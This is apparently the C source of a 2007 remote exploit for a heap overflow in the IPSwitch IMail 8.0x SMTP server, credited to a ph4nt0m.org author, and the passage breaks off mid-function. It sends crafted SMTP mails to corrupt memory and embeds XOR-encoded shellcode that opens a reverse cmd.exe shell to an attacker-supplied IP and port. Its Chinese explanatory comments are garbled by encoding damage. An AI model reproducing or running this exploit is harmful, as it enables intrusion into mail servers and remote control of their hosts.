IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit/*


  by axis
  2007-06-05
  http://www.ph4nt0m.org
  Mail-List: http://list.ph4nt0m.org


  Ã’ÔÇ°ÓÐÕâžöÒ»žöimailµÄexp
PRIVATE Remote Exploit  For IMAIL Smtp Server(1.2)
This is For imail 8.01-8.11 version
Usage:faint.exe -d <host> [options]
Options:
        -d:             Hostname to attack [Required]
        -t:             Type [Default: 0]
        -p:             Attack port [Default: 25]
        -S:             the IP connect back to.
        -P:             the port connect back to.
Types:
        0: win2k All version , IMail 8.01-11

  Â²Â»Ã–ªµÀÊÇÄÄλŽóţЎµÄ

×îœü¿ŽÁË¿Ž£¬

·Ç³£ºÃÍæµÄÒ»žö©¶Ž¡£

©¶ŽÊÇ·¢ÉúÔÚiaspam.dllÀï

loc_1001ada5       ==> Ã—¢Ò⶯̬µ÷ÊÔʱºò×¢ÒâŒÓÔØ»ùÖ·µÄ²»Í¬¡£
mov    eax, [ebp+var_54]
mov    ecx, [eax+10c8h]
push   ecx                 ; char *
mov    edx, [ebp+var_54]
mov    eax, [edx+10d0h]
push   eax                 ; char *
call   _strcpy
add    esp, 8
jmp    loc_1001a6f0


  Ã•Ã¢Ã€Ã¯strcpyµÄÁœžöbuffer£¬srcºÍdstµÄÖžÕ룬ŸÓÈ»ÊÇÖ±œÓŽÓ¶ÑÀï¶Á³öÀŽµÄ¡£
  Â¶Ã¸Ã–®Ç°Ã»ÓÐ×öÈκΌì²é

  Ã‹Ã¹Ã’Ô·¢ËÍžöÓÊŒþµœ·þÎñÆ÷£¬SMDÎÄŒþ

  ÃˆÂ»ÂºÃ³Ã”ÚÆäºóµÄÆ«ÒÆŽŠ¿ØÖÆÕâÁœžöµØÖ·£¬ŸÍ¿ÉÒÔ¿œ±ŽÈÎÒâ×Ö·ûŽ®µœÈÎÒâÄÚŽæ¡£

  badcharÊÇ 0x00 0x0a  emm˵»¹ÓОö 0x25,²»¹ýÎÒûÕÒµœ¡£


  Ã’ÔÇ°ÍøÉÏÄÇžö·ŽÁ¬µÄ°æ±Ÿ£¬ÊÇÀûÓÃÁËž²žÇpebÀïµÄÖžÕë¡£

  Ã•Ã¢Ã–Ö·œ·šÔÚ2003Éϲ»ÄÜÓá£

  Ã•Ã¢Ã€Ã¯ÃŽÃ’²ÉÓÃÁËemmµÄ·œ·š£¬¹¹ÔìÁËÒ»žöÒç³ö

  Ã’òΪimailsec.dllµÄ.data¶Î¿ÉÐŽ¡£

  Ã‹Ã¹Ã’ÔÎÒÕÒµœÁËÕâÃŽÒ»žöµØ·œ

1000CB5D    8B45 08         MOV EAX,DWORD PTR SS:[EBP+8]
1000CB60    50              PUSH EAX
1000CB61    8B0D 6C540310   MOV ECX,DWORD PTR DS:[1003546C]          ; IMailsec.1003549C
1000CB67    51              PUSH ECX
1000CB68    8D95 FCFDFFFF   LEA EDX,DWORD PTR SS:[EBP-204]
1000CB6E    52              PUSH EDX
1000CB6F    FF15 F8D30210   CALL DWORD PTR DS:[<&USER32.wsprintfA>]  ; USER32.wsprintfA


  Ã†Ã¤Ã–ÐÖžÕëDWORD PTR DS:[1003546C] Ã”Úimailsec.dllµÄ.dataÖУ¬ÕâžöµØÖ·¿ÉÒÔ±»ÎÒÃÇž²žÇ¡£

  Ã‹Ã¹Ã’ÔÎÒÃÇŸÍ¿ÉÒÔ¹¹ÔìÒ»žöÒç³ö¡£

  Ã‹Å’·ÈçÏ£º
  ÂµÃšÃ’»·âÓÊŒþ£º Â·Â¢Ã‹ÃshellcodeµœÄÚŽæÖб£ŽæºÃ¡£ÕâÀïÎҷŵœÁËtebÖÐ
  ÂµÃšÂ¶Ã¾Â·Ã¢Ã“ÊŒþ£º Â·Â¢Ã‹ÃÃ’ç³öÐèÒªµÄž²žÇ×Ö·ûŽ®µœÄÚŽæÖб£ŽæºÃ¡£ÕâÀïÎÒÒ²·ÅÔÚÁËtebÖÐ
  ÂµÃšÃˆÃ½Â·Ã¢Ã“ÊŒþ£º Å¾Â²Å¾Ã‡imailsec.dllÖеÄ .data¶ÎµÄÖžÕ룬ʹwsprintfAÔì³ÉÒç³ö

  Ã’ç³öž²žÇʹÓõÄ×Ö·ûŽ®Êǵڶþ·âÓÊŒþ·¢Ë͹ýÈ¥µÄ£¬ž²žÇºóµÄ·µ»ØµØÖ·Ö±œÓÖžÏòÁ˵ÚÒ»·âÓÊŒþ·¢Ë͹ýÈ¥µÄshellcodeÔÚÄÚŽæÖеĵØÖ·¡£

  Ã‹Ã¹Ã’ÔÕâžö©¶ŽÊǺÍƜ̚Î޹صģ¡£¡²»ÐèÒªÈκÎopcode£¡£¡

  Ã”ÚʵŒÊÀûÓÃʱÎÒ·¢ËÍÁË4·âÓÊŒþ£¬µÚÒ»·âÊÇ·ÏÓÊŒþ£¬ÓÃÓÚÌážß³É¹ŠÂÊ¡£


  Ã“ÉÓÚ»¥ÁªÍøµÄspam·ºÀÄ£¬ËùÒԵȵœÓÊŒþ·þÎñÆ÷ŽŠÀí©¶ŽÓÊŒþʱ£¬Ò²ÐíÒÑŸ­¹ýÁËŒžžöÔÂÁË¡£¡£¡£

  Ã‹Ã¹Ã’Ô×îºÃµÄ·œ°žÊÇʹÓÃdownload+exec ÂµÃ„shellcode¡£

  Ã•Ã¢Ã€Ã¯Å¾Ã¸Â³Ã¶Ã’»žö±ÈœÏÀõķŽÁ¬shellcode×÷Ϊpoc¡£


  Å¸Ãemm˵Õâžö©¶ŽÒ»Ö±Ã»²¹£¬Ö»ÊǞ߰江ûÓÐÁË¡£¡£¡£

  */

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#include <io.h>

#pragma comment (lib,"ws2_32")


char *szEHLO = "HELO\r\n";
char *szMF = "MAIL FROM <fucker@fuckimail.org>\r\n";
char *szRCPT = "RCPT TO: <postmaster>\r\n";
char *szDATA = "DATA\r\n";
char *szTIME = "Date: Thu, 1 Oct 2007 07:06:09 +0800\r\n";
char *szMIME = "MIME\r\n";
char *szEND = ".\r\n";
char *szQUIT = "QUIT\r\n";
char *szCT = "Content-Type: multipart/boundary=";
char *szCTE = "Content-Transfer-Encoding:";

//#define  SCaddr  "\x50\xe7\x03\x10"
#define  SCaddr  "\x50\xc8\xfd\x7f"
#define  Fuck_ptr "\x6c\x54\x03\x10"   //0x1003546c
#define  Teb_temp1  0x7ffdd050 
#define  Teb_temp2  0x7ffdd040 
#define  Teb_temp3  0x7ffdd030 


unsigned short port = 25;
unsigned char payload[5000] = "";#define PROC_BEGIN __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90\
                   __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90
#define PROC_END PROC_BEGIN

unsigned char sh_Buff[2048];
unsigned int  sh_Len;
unsigned int  Enc_key=0x99;        //ÆäʵÎ޹؜ôÒª,¶¯Ì¬Ñ°ÕÒ

unsigned char decode1[] =
/*
00401004   . /EB 0E         JMP SHORT encode.00401014
00401006   $ |5B            POP EBX
00401007   . |4B            DEC EBX
00401008   . |33C9          XOR ECX,ECX
0040100A   . |B1 FF         MOV CL,0FF
0040100C   > |80340B 99     XOR BYTE PTR DS:[EBX+ECX],99
00401010   .^|E2 FA         LOOPD SHORT encode.0040100C
00401012   . |EB 05         JMP SHORT encode.00401019
00401014   > \E8 EDFFFFFF   CALL encode.00401006
*/
"\xEB\x0E\x5B\x4B\x33\xC9\xB1"
"\xFF"          // shellcode size
"\x80\x34\x0B"
"\xB8"          // xor byte
"\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";

unsigned char decode2[] =
/*
00406030   /EB 10           JMP SHORT 00406042
00406032   |5B              POP EBX
00406033   |4B              DEC EBX
00406034   |33C9            XOR ECX,ECX
00406036   |66:B9 6601      MOV CX,166
0040603A   |80340B 99       XOR BYTE PTR DS:[EBX+ECX],99
0040603E  ^|E2 FA           LOOPD SHORT 0040603A
00406040   |EB 05           JMP SHORT 00406047
00406042   \E8 EBFFFFFF     CALL 00406032
*/
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9"
"\x66\x01"      // shellcode size
"\x80\x34\x0B"
"\xB8"          // xor byte
"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF";

// kernel32.dll functions index
#define _LoadLibraryA            0x00
#define _CreateProcessA            0x04
//#define _ExitProcess            0x08
#define _ExitThread             0x08
#define    _WaitForSingleObject    0x0C
// ws2_32.dll functions index
#define _WSASocketA                0x10
#define _connect                0x14
#define _closesocket            0x18
//#define _WSAStartup            0x1C

// functions number
#define _Knums                  4
#define _Wnums                  3

// Need functions
unsigned char functions[100][128] =         
{                                           // [esi] stack layout
    // kernel32 4                           // 00 kernel32.dll
    {"LoadLibraryA"},                       //    [esi]
    {"CreateProcessA"},                     //    [esi+4]       
    {"ExitThread"},                         //    [esi+8]
    //{"ExitProcess"},
    //{"TerminateProcess"},
    {"WaitForSingleObject"},                //    [esi+12] 

    // ws2_32  3                            // 01 ws2_32.dll
    {"WSASocketA"},                         //    [esi+16]     
    {"connect"},                            //    [esi+20]        
    {"closesocket"},                        //    [esi+24]
    //{"WSAStartup"},                       //    [esi+28]
    {""},
};

void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();

// Get function hash
unsigned long hash(unsigned char *c)
{
    unsigned long h=0;
    while(*c)
    {
        h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
    }
    return h;
}

// get shellcode
void GetShellCode(char* ipstr, short port)
{
    char  *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    char  *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    unsigned char  *pSc_addr;
    unsigned char  pSc_Buff[2048];
    unsigned int   MAX_Sc_Len=0x2000;
    unsigned long  dwHash[100];
    unsigned int   dwHashSize;

    unsigned int l,i,j,k;

    char *p;
    int ip;

    // Get functions hash
    for (i=0;;i++) {
        if (functions[i][0] == '\x0') break;

        dwHash[i] = hash(functions[i]);
        //fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]);
    }
    dwHashSize = i*4;

    // Deal with shellcode
    pSc_addr = (unsigned char *)ShellCode;

    for (k=0;k<MAX_Sc_Len;++k ) {
        if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
            break;
        }
    }
    pSc_addr+=(k+8);   // start of the ShellCode
    
    for (k=0;k<MAX_Sc_Len;++k) {
        if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
            break;
        }
    }
    sh_Len=k; // length of the ShellCode
    
    memcpy(pSc_Buff, pSc_addr, sh_Len);

    for(k=0; k<sh_Len; ++k)
    {
        if(memcmp(pSc_Buff+k, "\x68\x7F\x00\x00\x01", 5) == 0)
        {
            ip = inet_addr(ipstr);
            p = (char*)&ip;
            pSc_Buff[k+1] = p[0];
            pSc_Buff[k+2] = p[1];
            pSc_Buff[k+3] = p[2];
            pSc_Buff[k+4] = p[3];
        }
        if(memcmp(pSc_Buff+k, "\x68\x02\x00\x00\x35", 5) == 0)
        {
            p = (char*)&port;
            pSc_Buff[k+3] = p[1]; 
            pSc_Buff[k+4] = p[0];
        }
    }

    // Add functions hash
    memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
    sh_Len += dwHashSize;

    //printf("%d bytes shellcode\n", sh_Len);
    // print shellcode
    //PrintSc(pSc_Buff, sh_Len);

    // find xor byte
    for(i=0xff; i>0; i--)
    {
        l = 0;
        for(j=0; j<sh_Len; j++)
        {
            if ( 
//                   ((pSc_Buff[j] ^ i) == 0x26) ||    //%
//                   ((pSc_Buff[j] ^ i) == 0x3d) ||    //=
    //               ((pSc_Buff[j] ^ i) == 0x3f) ||    //?
                   //((pSc_Buff[j] ^ i) == 0x40) ||    //@
                   ((pSc_Buff[j] ^ i) == 0x00) ||
                   //((pSc_Buff[j] ^ i) == 0x3c) ||
                   //((pSc_Buff[j] ^ i) == 0x3e) ||
    //               ((pSc_Buff[j] ^ i) == 0x2f) ||
    //               ((pSc_Buff[j] ^ i) == 0x22) ||
    //               ((pSc_Buff[j] ^ i) == 0x2a) ||
                   //((pSc_Buff[j] ^ i) == 0x3a) ||
    //               ((pSc_Buff[j] ^ i) == 0x20) ||
                   ((pSc_Buff[j] ^ i) == 0x25) ||
                   ((pSc_Buff[j] ^ i) == 0x0D) ||
                   ((pSc_Buff[j] ^ i) == 0x0A) 
    //               ((pSc_Buff[j] ^ i) == 0x5C)
                )
            {
                l++;
                break;
            };
        }

        if (l==0)
        {
            Enc_key = i;
            //printf("Find XOR Byte: 0x%02X\n", i);
            for(j=0; j<sh_Len; j++)
            {
                pSc_Buff[j] ^= Enc_key;
            }

            break;                        // break when found xor byte
        }
    }

    // No xor byte found
    if (l!=0){
        //fprintf(stderr, "No xor byte found!\n");

        sh_Len  = 0;
    }
    else {
        //fprintf(stderr, "Xor byte 0x%02X\n", Enc_key);

        // encode
        if (sh_Len > 0xFF) {
            *(unsigned short *)&decode2[8] = sh_Len;
            *(unsigned char *)&decode2[13] = Enc_key;

            memcpy(sh_Buff, decode2, sizeof(decode2)-1);
            memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
            sh_Len += sizeof(decode2)-1;
        }
        else {
            *(unsigned char *)&decode1[7]  = sh_Len;
            *(unsigned char *)&decode1[11] = Enc_key;

            memcpy(sh_Buff, decode1, sizeof(decode1)-1);
            memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
            sh_Len += sizeof(decode1)-1;
        }
    }
}

// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
    int i,j;
    char *p;
    char msg[4];

    printf("/* %d bytes */\n",buffsize);
    for(i=0;i<buffsize;i++)
    {
        if((i%16)==0)
            if(i!=0)
                printf("\"\n\"");
            else
                printf("\"");
        sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p))
                printf("%c", _tolower(*p));
            else
                printf("%c", p[0]);
        }
    }
   printf( "\";\n");
}

// ShellCode function
void ShellCode()
{
    __asm
    {
        PROC_BEGIN                          // C macro to begin proc

        jmp     sc_end       
sc_start:         
        pop     edi                         // Hash string start addr (esp -> edi)

        // Get kernel32.dll base addr
        mov     eax, fs:0x30                // PEB
        mov     eax, [eax+0x0c]             // PROCESS_MODULE_INFO
        mov     esi, [eax+0x1c]             // InInitOrder.flink 
        lodsd                               // eax = InInitOrder.blink
        mov     ebp, [eax+8]                // ebp = kernel32.dll base address

        mov     esi, edi                    // Hash string start addr -> esi
    
    // Get function addr of kernel32
        push    _Knums
        pop     ecx
        
    get_kernel32:
        call    GetProcAddress_fun
        loop    get_kernel32

        // Get ws2_32.dll base addr
        push    0x00003233
        push    0x5f327377
        push    esp
        call    dword ptr [esi+_LoadLibraryA]         // LoadLibraryA("ws2_32");
        
        //mov     ebp, eax                   // ebp = ws2_32.dll base address
        xchg    eax, ebp

   // Get function addr of ws2_32
        push    _Wnums
        pop     ecx

    get_ws2_32:
        call    GetProcAddress_fun
        loop    get_ws2_32


//
/*     
//LWSAStartup:
        sub     esp, 400
        push    esp
        push    0x101
        call    dword ptr [esi+_WSAStartup]             // WSAStartup(0x101, &WSADATA);
//
*/

//LWSASocketA:
        push    ecx
        push    ecx
        push    ecx
        push    ecx

        push    1
        push    2
        call    dword ptr [esi+_WSASocketA]   // s=WSASocketA(2,1,0,0,0,0);

        //mov     ebx, eax                    // socket -> ebx
        xchg    eax, ebx
        
//Lconnect:
        //int 3
        push    0x0100007F                     // host: 127.0.0.1 
        push    0x35000002                     // port: 53 
        mov     ebp, esp
        
        push    0x10                        // sizeof(sockaddr_in)
        push    ebp                         // sockaddr_in address
        push    ebx                         // socket s
        call    dword ptr [esi+_connect]    // connect(s, name, sizeof(name));

        // if connect failed , exit
        test    eax, eax
        jne     Finished
        
//        xor     eax, eax
        
        // allot memory for STARTUPINFO, PROCESS_INFORMATION
        mov     edi, esp
           
        // zero out SI/PI
        push    0x12
        pop     ecx
    stack_zero:
        stosd
        loop    stack_zero
        
        //mov     byte ptr [esp+0x10], 0x44   // si.cb = sizeof(si)
        //inc     byte ptr [esp+0x3C]         // si.dwFlags
        //inc     byte ptr [esp+0x3D]         // si.wShowWindow
        //mov     [esp+0x48], ebx             // si.hStdInput = s
        //mov     [esp+0x4C], ebx             // si.hStdOutput = s
        //mov     [esp+0x50], ebx             // si.hStdError = s
        
        mov     word ptr  [esp+0x3c], 0x0101
        xchg    eax, ebx
        stosd
        stosd
        stosd
    
        mov     edi, esp
    
        // push "cmd"
        push    0x00646d63                  // "cmd"
        mov     ebp, esp

        push    eax                         // socket
        
//LCreateProcess:
        lea     eax, [edi+0x10]                    
        push    edi                         // pi
        push    eax                         // si
        push    ecx                         // lpCurrentDirectory
        push    ecx                         // lpEnvironment
        push    ecx                         // dwCreationFlags
        push    1                           // bInheritHandles
        push    ecx                         // lpThreadAttributes
        push    ecx                         // lpProcessAttributes
        push    ebp                         // lpCommandLine =  "cmd"
        push    ecx                         // lpApplicationName NULL
        call    dword ptr [esi+_CreateProcessA]         // CreactProcessA(NULL,"CMD",0,0,1,0,0,0,si, pi);
    
//LWaitForSingleObject:
        //push    1  
        push    0xFFFFFFFF
        push    dword ptr [edi]
        call    dword ptr [esi+_WaitForSingleObject]    // WaitForSingleObject(Handle, time) ;

//LCloseSocket:
        //push    ebx
        call    dword ptr [esi+_closesocket]           // closesocket(c);

Finished:
        // Â»Ã–žŽ¹¹ÔìµÄÒç³öµã
        mov     eax, 0x1003546c
        mov     DWORD ptr [eax],    0x1003549c
        mov     DWORD ptr [eax+4],  0x100354c8
        mov     DWORD ptr [eax+8],  0x100354e0        //push    1
        //call    dword ptr [esi+_ExitProcess]            // ExitProcess();
        xor     eax, eax
        push    eax
        call    dword ptr [esi+_ExitThread]

// 
GetProcAddress_fun:    
        push    ecx
        push    esi
    
        mov     esi, [ebp+0x3C]             // e_lfanew
        mov     esi, [esi+ebp+0x78]         // ExportDirectory RVA
        add     esi, ebp                    // rva2va
        push    esi
        mov     esi, [esi+0x20]              // AddressOfNames RVA
        add     esi, ebp                    // rva2va
        xor     ecx, ecx
        dec     ecx

    find_start:
        inc     ecx
        lodsd
        add     eax, ebp
        xor     ebx, ebx
        
    hash_loop:
        movsx   edx, byte ptr [eax]
        cmp     dl, dh
        jz      short find_addr
        ror     ebx, 7               // hash key
        add     ebx, edx
        inc     eax
        jmp     short hash_loop
     
    find_addr:
        cmp     ebx, [edi]                  // compare to hash
        jnz     short find_start
        pop     esi                         // ExportDirectory
                    // AddressOfNameOrdinals RVA
/*
//--------------------------------------------------------
        jmp over_it
        __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 
        __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
        __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 
        __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 
//--------------------------------------------------------

over_it:
*/
        mov     ebx, [esi+0x24] 
        add     ebx, ebp                    // rva2va
        mov     cx, [ebx+ecx*2]             // FunctionOrdinal
        mov     ebx, [esi+0x1C]             // AddressOfFunctions RVA
        add     ebx, ebp                    // rva2va
        mov     eax, [ebx+ecx*4]            // FunctionAddress RVA
        add     eax, ebp                    // rva2va
        stosd                               // function address save to [edi]
        
        pop     esi
        pop     ecx
        ret
        
sc_end:
        call sc_start
       
        PROC_END                            //C macro to end proc
    }
}

// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons((short)port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);
    return s;
}
void Disconnect(SOCKET s)
{
    closesocket(s);
    WSACleanup();
}void help(char *n)
{
    printf("==Usage:\n");
    printf("%s [target ip] [target port] [local ip] [local port]\n\n", n);
    printf("We will send 4 mail to trigger the vuln.\n");
    printf("The fucking vuln will be triggered when the mail server handling the mail.\n");
    printf("Because of the Spam in the internet,\nthe vuln maybe triggered after a few days!!Fuck!!\n\n");

}


int sendfuckingmail(int the_mail, char *target, int tg_port)
{
    SOCKET  s;
    WSADATA WSAData;
    char buffer[1000] = {0};    // ÃÃ™ÃŠÂ±bufferÓÃÓÚio
    int  ret;

    char padding[5000] = {0};   // paddingÓÃÓÚÌî³ä

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        fprintf(stderr, "[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }


    s = Make_Connection(target, tg_port, 10);
    if(s<0)
    {
        fprintf(stderr, "[-] connect err.\n");
        exit(1);
    }
    

    recv(s, buffer, sizeof(buffer), 0);
    Sleep(1000);
  
    ret = strlen(buffer);    

    if ( ret < 10 )
    {        
        printf("[-]Seems Service Down~ :( \n");
        Disconnect(s);
        return -1;        
    }


    printf("[+]Got Banner: %s", buffer);    // HELO
    send(s, szEHLO, strlen(szEHLO), 0);
    recv(s, buffer, sizeof(buffer), 0);
//    printf("%s", buffer);
    printf("[+]Say hello to Server.\n");
    memset(buffer, 0, sizeof(buffer));

    // MAIL FROM
    Sleep(500);
    send(s, szMF, strlen(szMF), 0);
    recv(s, buffer, sizeof(buffer), 0);
    if(strstr(buffer, "250"))
      printf("[+]Recv: %s", buffer);
    else
        {
            printf("[-]Seems Service Down~ :( \n");
            Disconnect(s);
            return -1;
        }
    memset(buffer, 0, sizeof(buffer));


    // RCPT TO
    Sleep(500);
    send(s, szRCPT, strlen(szRCPT), 0);
    recv(s, buffer, sizeof(buffer), 0);
    if(strstr(buffer, "250"))
      printf("[+]Recv: %s", buffer);
    else
        {
            printf("[-]Seems Service Down~ :( \n");
            Disconnect(s);
            return -1;
        }
    memset(buffer, 0, sizeof(buffer));


    // DATA
    Sleep(500);
    send(s, szDATA, strlen(szDATA), 0);
    recv(s, buffer, sizeof(buffer), 0);
    if(strstr(buffer, "354"))
      printf("[+]Recv: %s", buffer);
    else
        {
            printf("[-]Seems Service Down~ :( \n");
            Disconnect(s);
            return -1;
        }
    memset(buffer, 0, sizeof(buffer));


    Sleep(100);
    // TIME
    send(s, szTIME, strlen(szTIME), 0);
//    recv(s, buffer, sizeof(buffer), 0);
//    printf("%s", buffer);
    printf("[+]Fucking Server at %s", szTIME);
    memset(buffer, 0, sizeof(buffer));

    

    Sleep(200);


    // Ã…жÏÊǵڌž·âÓÊŒþ
    if (the_mail == 0)   // Â·Â¢Ã’»·â·ÏÓÊŒþ£¬Ìážß³É¹ŠÂÊ
    {
        /*
           my $padding = "\x22"."B"x2028;
           my $padding1 = "B"x2046;
           my $padding11 = "B"x146;   #163žöB
           my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f";     # Ã”ÚtebÖÐ
           my $straddr2 = "\x50\xc0\xfd\x7f";     # shellcode»á¿œ±ŽµœµÄµØÖ·

           print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
        */
        memcpy(payload, szCT, strlen((const char *)szCT));
        //memcpy(payload+strlen(const char *szCT), "\"", 1);
        memset(padding, 0x43, 5000);
        padding[0] = '\x22';   
        padding[2029] = '\x20';
        padding[4076] = '\x20';

        //straddr1
        padding[4223] = '\x50';
        padding[4224] = '\xd0';
        padding[4225] = '\xfd';
        padding[4226] = '\x7f';
        padding[4227] = '\x30';
        padding[4228] = '\xd0';
        padding[4229] = '\xfd';
        padding[4230] = '\x7f';

        //straddr2   0x10036ea0
        padding[4231] = '\x30';
        padding[4232] = '\xd8';
        padding[4233] = '\xfd';
        padding[4234] = '\x7f';

        padding[4235] = '\x0d';
        padding[4236] = '\x0a';
        padding[4237] = '\x00';

        
        memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
        send(s, (const char *)payload, strlen((const char *)payload), 0);

        Sleep(100);
        // MIME
         send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
   //    recv(s, buffer, sizeof(buffer), 0);
  //    printf("%s", buffer);
   //     printf("[+]Fucking Server at %s.\n", szTIME);
   //     memset(buffer, 0, sizeof(buffer));
        
        //print $sock "Content-Transfer-Encoding:$padding2\r\n";
        memset(padding, 0x43, 80);
        //memcpy(padding, "\x43", 80);
        padding[80] = '\x00';

        memset(payload, 0x00, sizeof(payload));
        memcpy(payload, szCTE, strlen((const char*)szCTE));
        memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
        memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);

        Sleep(200);
        send(s, (const char *)payload, strlen((const char *)payload), 0);

        memset(payload, 0x00, sizeof(payload));

    } 
    else if (the_mail == 1)   // Â¹Â¹Ã”ìbufferoverflowµÄž²žÇ×Ö·ûŽ®
    {
        /*
           my $padding = "\x22"."B"x2028;
           my $padding1 = "B"x2046;
           my $padding11 = "B"x146;   #163žöB
           my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f";     # Ã”ÚtebÖÐ
           my $straddr2 = "\x50\xc0\xfd\x7f";     # shellcode»á¿œ±ŽµœµÄµØÖ·

           print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
        */
        memcpy(payload, szCT, strlen((const char *)szCT));
        //memcpy(payload+strlen(const char *szCT), "\"", 1);
        memset(padding, 0x43, 5000);
        padding[0] = '\x22';   
        padding[2029] = '\x20';
        padding[4076] = '\x20';

        //straddr1
        padding[4223] = '\x50';
        padding[4224] = '\xd0';
        padding[4225] = '\xfd';
        padding[4226] = '\x7f';
        padding[4227] = '\x30';
        padding[4228] = '\xd0';
        padding[4229] = '\xfd';
        padding[4230] = '\x7f';

        //straddr2   0x10036ea0
        padding[4231] = '\x50';
        padding[4232] = '\xc0';
        padding[4233] = '\xfd';
        padding[4234] = '\x7f';

        padding[4235] = '\x0d';
        padding[4236] = '\x0a';
        padding[4237] = '\x00';

        
        memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
        send(s, (const char *)payload, strlen((const char *)payload), 0);

        Sleep(100);
        // MIME
         send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
   //    recv(s, buffer, sizeof(buffer), 0);
  //    printf("%s", buffer);
   //     printf("[+]Fucking Server at %s.\n", szTIME);
   //     memset(buffer, 0, sizeof(buffer));
        
        //print $sock "Content-Transfer-Encoding:$padding2\r\n";
        memset(padding, 0x43, 80);
        //memcpy(padding, "\x43", 80);
        padding[80] = '\x00';

        memset(payload, 0x00, sizeof(payload));
        memcpy(payload, szCTE, strlen((const char*)szCTE));
        memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
        memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);

        Sleep(200);
        send(s, (const char *)payload, strlen((const char *)payload), 0);


        // send payload  Â¹Â¹Ã”ìÒç³öµÄ×Ö·ûŽ®  eipÖžÏòshellcodeµÄµØÖ·
        memset(payload, 0x00, sizeof(payload));
        memset(payload, 0x44, 520);
        memcpy(payload+520, SCaddr, strlen((const char *)SCaddr));
        memcpy(payload+520+4, "\r\n", 2);

        Sleep(200);
        send(s, (const char *)payload, strlen((const char *)payload), 0);

        memset(payload, 0x00, sizeof(payload));
        
    }
    else if (the_mail == 2)      // Â·Â¢Ã‹Ãshellcode
    {
        /*
           my $padding = "\x22"."B"x2028;
           my $padding1 = "B"x2046;
           my $padding11 = "B"x146;   #163žöB
           my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f";     # Ã”ÚtebÖÐ
           my $straddr2 = "\x50\xe7\x03\x10";     # shellcode»á¿œ±ŽµœµÄµØÖ·

           print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
        */
        memcpy(payload, szCT, strlen((const char *)szCT));
        //memcpy(payload+strlen(const char *szCT), "\"", 1);
        memset(padding, 0x43, 5000);
        padding[0] = '\x22';   
        padding[2029] = '\x20';
        padding[4076] = '\x20';

        //straddr1
        padding[4223] = '\x50';
        padding[4224] = '\xd0';
        padding[4225] = '\xfd';
        padding[4226] = '\x7f';
        padding[4227] = '\x30';
        padding[4228] = '\xd0';
        padding[4229] = '\xfd';
        padding[4230] = '\x7f';

        //straddr2   0x7ffdc850
        padding[4231] = '\x50';
        padding[4232] = '\xc8';
        padding[4233] = '\xfd';
        padding[4234] = '\x7f';

        padding[4235] = '\x0d';
        padding[4236] = '\x0a';
        padding[4237] = '\x00';

        
        memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
        send(s, (const char *)payload, strlen((const char *)payload), 0);

        // MIME
         send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
   //    recv(s, buffer, sizeof(buffer), 0);
  //    printf("%s", buffer);
